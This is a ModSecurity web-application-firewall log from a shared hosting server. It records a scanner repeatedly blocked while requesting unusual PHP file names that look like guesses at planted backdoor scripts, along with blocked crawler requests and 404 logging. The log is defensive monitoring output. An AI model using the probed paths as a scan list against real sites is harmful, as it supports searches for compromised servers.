[Tue May 26 16:26:12.035926 2026] [security2:error] [pid 795941:tid 796169] [client 114.5.247.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8S-2GQ_TLE_VHIp2ilgAAAOc"]
[Tue May 26 16:26:12.179347 2026] [security2:error] [pid 795941:tid 796186] [client 20.226.60.108:25906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahV8TO2GQ_TLE_VHIp2iswAAAPg"]
[Tue May 26 16:26:12.179518 2026] [security2:error] [pid 795941:tid 796186] [client 20.226.60.108:25906] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahV8TO2GQ_TLE_VHIp2iswAAAPg"]
[Tue May 26 16:26:12.651294 2026] [security2:error] [pid 795941:tid 796163] [client 37.59.204.128:49302] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "srsglobalsoft.com"] [uri "/robots.txt"] [unique_id "ahV8TO2GQ_TLE_VHIp2ivwAAAOE"]
[Tue May 26 16:26:12.651433 2026] [security2:error] [pid 795941:tid 796163] [client 37.59.204.128:49302] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "srsglobalsoft.com"] [uri "/robots.txt"] [unique_id "ahV8TO2GQ_TLE_VHIp2ivwAAAOE"]
[Tue May 26 16:26:12.666454 2026] [security2:error] [pid 795941:tid 796150] [client 20.226.60.108:25856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahV8TO2GQ_TLE_VHIp2iwAAAANQ"]
[Tue May 26 16:26:12.666564 2026] [security2:error] [pid 795941:tid 796150] [client 20.226.60.108:25856] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahV8TO2GQ_TLE_VHIp2iwAAAANQ"]
[Tue May 26 16:26:13.165543 2026] [security2:error] [pid 795941:tid 796173] [client 20.226.60.108:50858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahV8Te2GQ_TLE_VHIp2iywAAAOs"]
[Tue May 26 16:26:13.165693 2026] [security2:error] [pid 795941:tid 796173] [client 20.226.60.108:50858] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahV8Te2GQ_TLE_VHIp2iywAAAOs"]
[Tue May 26 16:26:13.507911 2026] [security2:error] [pid 795941:tid 796183] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8TO2GQ_TLE_VHIp2iugAAAPU"]
[Tue May 26 16:26:13.584909 2026] [security2:error] [pid 795941:tid 796194] [client 20.226.60.108:65464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/011i.php"] [unique_id "ahV8Te2GQ_TLE_VHIp2i0gAAAQA"]
[Tue May 26 16:26:13.585022 2026] [security2:error] [pid 795941:tid 796194] [client 20.226.60.108:65464] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/011i.php"] [unique_id "ahV8Te2GQ_TLE_VHIp2i0gAAAQA"]
[Tue May 26 16:26:13.950478 2026] [security2:error] [pid 795941:tid 796127] [client 20.226.60.108:65447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahV8Te2GQ_TLE_VHIp2i2AAAAL0"]
[Tue May 26 16:26:13.950584 2026] [security2:error] [pid 795941:tid 796127] [client 20.226.60.108:65447] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahV8Te2GQ_TLE_VHIp2i2AAAAL0"]
[Tue May 26 16:26:14.064819 2026] [security2:error] [pid 795941:tid 796083] [client 54.39.136.89:54796] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "srsglobalsoft.com"] [uri "/"] [unique_id "ahV8Tu2GQ_TLE_VHIp2i2QAAAJE"]
[Tue May 26 16:26:14.064941 2026] [security2:error] [pid 795941:tid 796083] [client 54.39.136.89:54796] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "srsglobalsoft.com"] [uri "/"] [unique_id "ahV8Tu2GQ_TLE_VHIp2i2QAAAJE"]
[Tue May 26 16:26:14.422085 2026] [security2:error] [pid 795941:tid 796112] [client 20.226.60.108:25876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/sid3.php"] [unique_id "ahV8Tu2GQ_TLE_VHIp2i4QAAAK4"]
[Tue May 26 16:26:14.422270 2026] [security2:error] [pid 795941:tid 796112] [client 20.226.60.108:25876] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/sid3.php"] [unique_id "ahV8Tu2GQ_TLE_VHIp2i4QAAAK4"]
[Tue May 26 16:26:14.837135 2026] [security2:error] [pid 795941:tid 796085] [client 20.226.60.108:15578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahV8Tu2GQ_TLE_VHIp2i7gAAAJM"]
[Tue May 26 16:26:14.837239 2026] [security2:error] [pid 795941:tid 796085] [client 20.226.60.108:15578] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahV8Tu2GQ_TLE_VHIp2i7gAAAJM"]
[Tue May 26 16:26:15.296876 2026] [security2:error] [pid 795941:tid 796153] [client 20.226.60.108:65436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahV8T-2GQ_TLE_VHIp2i8AAAANc"]
[Tue May 26 16:26:15.297011 2026] [security2:error] [pid 795941:tid 796153] [client 20.226.60.108:65436] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahV8T-2GQ_TLE_VHIp2i8AAAANc"]
[Tue May 26 16:26:15.665204 2026] [security2:error] [pid 795941:tid 796131] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Tu2GQ_TLE_VHIp2i5AAAAME"]
[Tue May 26 16:26:15.752025 2026] [security2:error] [pid 795941:tid 796195] [client 20.226.60.108:25892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahV8T-2GQ_TLE_VHIp2i-QAAAQE"]
[Tue May 26 16:26:15.752137 2026] [security2:error] [pid 795941:tid 796195] [client 20.226.60.108:25892] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahV8T-2GQ_TLE_VHIp2i-QAAAQE"]
[Tue May 26 16:26:16.131188 2026] [security2:error] [pid 795941:tid 796154] [client 20.226.60.108:60766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahV8UO2GQ_TLE_VHIp2jBQAAANg"]
[Tue May 26 16:26:16.131287 2026] [security2:error] [pid 795941:tid 796154] [client 20.226.60.108:60766] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahV8UO2GQ_TLE_VHIp2jBQAAANg"]
[Tue May 26 16:26:16.554016 2026] [security2:error] [pid 795941:tid 796086] [client 20.226.60.108:24438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahV8UO2GQ_TLE_VHIp2jDQAAAJQ"]
[Tue May 26 16:26:16.554142 2026] [security2:error] [pid 795941:tid 796086] [client 20.226.60.108:24438] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahV8UO2GQ_TLE_VHIp2jDQAAAJQ"]
[Tue May 26 16:26:16.982158 2026] [security2:error] [pid 795941:tid 796150] [client 20.226.60.108:44920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/leaf.php"] [unique_id "ahV8UO2GQ_TLE_VHIp2jQwAAANQ"]
[Tue May 26 16:26:16.982309 2026] [security2:error] [pid 795941:tid 796150] [client 20.226.60.108:44920] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/leaf.php"] [unique_id "ahV8UO2GQ_TLE_VHIp2jQwAAANQ"]
[Tue May 26 16:26:17.364255 2026] [security2:error] [pid 795941:tid 796196] [client 20.226.60.108:18456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/grsiuk.php"] [unique_id "ahV8Ue2GQ_TLE_VHIp2jSQAAAQI"]
[Tue May 26 16:26:17.364392 2026] [security2:error] [pid 795941:tid 796196] [client 20.226.60.108:18456] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/grsiuk.php"] [unique_id "ahV8Ue2GQ_TLE_VHIp2jSQAAAQI"]
[Tue May 26 16:26:17.819267 2026] [security2:error] [pid 795941:tid 796132] [client 20.226.60.108:37696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahV8Ue2GQ_TLE_VHIp2jUAAAAMI"]
[Tue May 26 16:26:17.819397 2026] [security2:error] [pid 795941:tid 796132] [client 20.226.60.108:37696] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahV8Ue2GQ_TLE_VHIp2jUAAAAMI"]
[Tue May 26 16:26:18.218201 2026] [security2:error] [pid 795941:tid 796128] [client 20.226.60.108:37713] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahV8Uu2GQ_TLE_VHIp2jXAAAAL4"]
[Tue May 26 16:26:18.218295 2026] [security2:error] [pid 795941:tid 796128] [client 20.226.60.108:37713] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahV8Uu2GQ_TLE_VHIp2jXAAAAL4"]
[Tue May 26 16:26:18.296414 2026] [security2:error] [pid 795941:tid 796101] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8UO2GQ_TLE_VHIp2jAQAAAKM"]
[Tue May 26 16:26:18.675523 2026] [security2:error] [pid 795941:tid 796083] [client 20.226.60.108:2605] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/ws38.php"] [unique_id "ahV8Uu2GQ_TLE_VHIp2jYgAAAJE"]
[Tue May 26 16:26:18.675660 2026] [security2:error] [pid 795941:tid 796083] [client 20.226.60.108:2605] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/ws38.php"] [unique_id "ahV8Uu2GQ_TLE_VHIp2jYgAAAJE"]
[Tue May 26 16:26:18.953731 2026] [security2:error] [pid 795941:tid 796175] [client 20.104.227.76:34813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.unsobered.moes-art.com"] [uri "/wk/index.php"] [unique_id "ahV8Uu2GQ_TLE_VHIp2jZgAAAO0"]
[Tue May 26 16:26:19.051485 2026] [security2:error] [pid 795941:tid 796143] [client 20.226.60.108:25896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/a7.php"] [unique_id "ahV8U-2GQ_TLE_VHIp2jcAAAAM0"]
[Tue May 26 16:26:19.051644 2026] [security2:error] [pid 795941:tid 796143] [client 20.226.60.108:25896] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/a7.php"] [unique_id "ahV8U-2GQ_TLE_VHIp2jcAAAAM0"]
[Tue May 26 16:26:19.173584 2026] [security2:error] [pid 795941:tid 796184] [client 52.167.144.54:42374] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "deeigo.com"] [uri "/public/index.php"] [unique_id "ahV8Uu2GQ_TLE_VHIp2jYAAA9n0"]
[Tue May 26 16:26:19.482293 2026] [security2:error] [pid 795941:tid 796169] [client 20.226.60.108:50833] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/classsmtps.php"] [unique_id "ahV8U-2GQ_TLE_VHIp2jegAAAOc"]
[Tue May 26 16:26:19.482445 2026] [security2:error] [pid 795941:tid 796169] [client 20.226.60.108:50833] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/classsmtps.php"] [unique_id "ahV8U-2GQ_TLE_VHIp2jegAAAOc"]
[Tue May 26 16:26:19.660941 2026] [security2:error] [pid 795941:tid 796166] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Uu2GQ_TLE_VHIp2jXwAAAOQ"]
[Tue May 26 16:26:19.955559 2026] [security2:error] [pid 795941:tid 796142] [client 20.226.60.108:60741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/amax.php"] [unique_id "ahV8U-2GQ_TLE_VHIp2jggAAAMw"]
[Tue May 26 16:26:19.955711 2026] [security2:error] [pid 795941:tid 796142] [client 20.226.60.108:60741] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/amax.php"] [unique_id "ahV8U-2GQ_TLE_VHIp2jggAAAMw"]
[Tue May 26 16:26:20.253559 2026] [security2:error] [pid 795941:tid 796151] [client 14.228.100.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8U-2GQ_TLE_VHIp2jbgAAANU"]
[Tue May 26 16:26:20.428564 2026] [security2:error] [pid 795941:tid 796128] [client 20.226.60.108:26825] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/CDX1.php"] [unique_id "ahV8VO2GQ_TLE_VHIp2jiwAAAL4"]
[Tue May 26 16:26:20.428694 2026] [security2:error] [pid 795941:tid 796128] [client 20.226.60.108:26825] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/CDX1.php"] [unique_id "ahV8VO2GQ_TLE_VHIp2jiwAAAL4"]
[Tue May 26 16:26:20.806564 2026] [security2:error] [pid 795941:tid 796126] [client 20.226.60.108:59035] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahV8VO2GQ_TLE_VHIp2jmAAAALw"]
[Tue May 26 16:26:20.806680 2026] [security2:error] [pid 795941:tid 796126] [client 20.226.60.108:59035] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahV8VO2GQ_TLE_VHIp2jmAAAALw"]
[Tue May 26 16:26:21.205285 2026] [security2:error] [pid 795941:tid 796167] [client 20.226.60.108:2574] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahV8Ve2GQ_TLE_VHIp2jpAAAAOU"]
[Tue May 26 16:26:21.205398 2026] [security2:error] [pid 795941:tid 796167] [client 20.226.60.108:2574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahV8Ve2GQ_TLE_VHIp2jpAAAAOU"]
[Tue May 26 16:26:21.205522 2026] [security2:error] [pid 795941:tid 796167] [client 20.226.60.108:2574] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahV8Ve2GQ_TLE_VHIp2jpAAAAOU"]
[Tue May 26 16:26:21.512508 2026] [security2:error] [pid 795941:tid 796083] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8VO2GQ_TLE_VHIp2jmQAAAJE"]
[Tue May 26 16:26:21.589553 2026] [security2:error] [pid 795941:tid 796194] [client 20.226.60.108:27280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/chosen.php"] [unique_id "ahV8Ve2GQ_TLE_VHIp2jqwAAAQA"]
[Tue May 26 16:26:21.589671 2026] [security2:error] [pid 795941:tid 796194] [client 20.226.60.108:27280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/chosen.php"] [unique_id "ahV8Ve2GQ_TLE_VHIp2jqwAAAQA"]
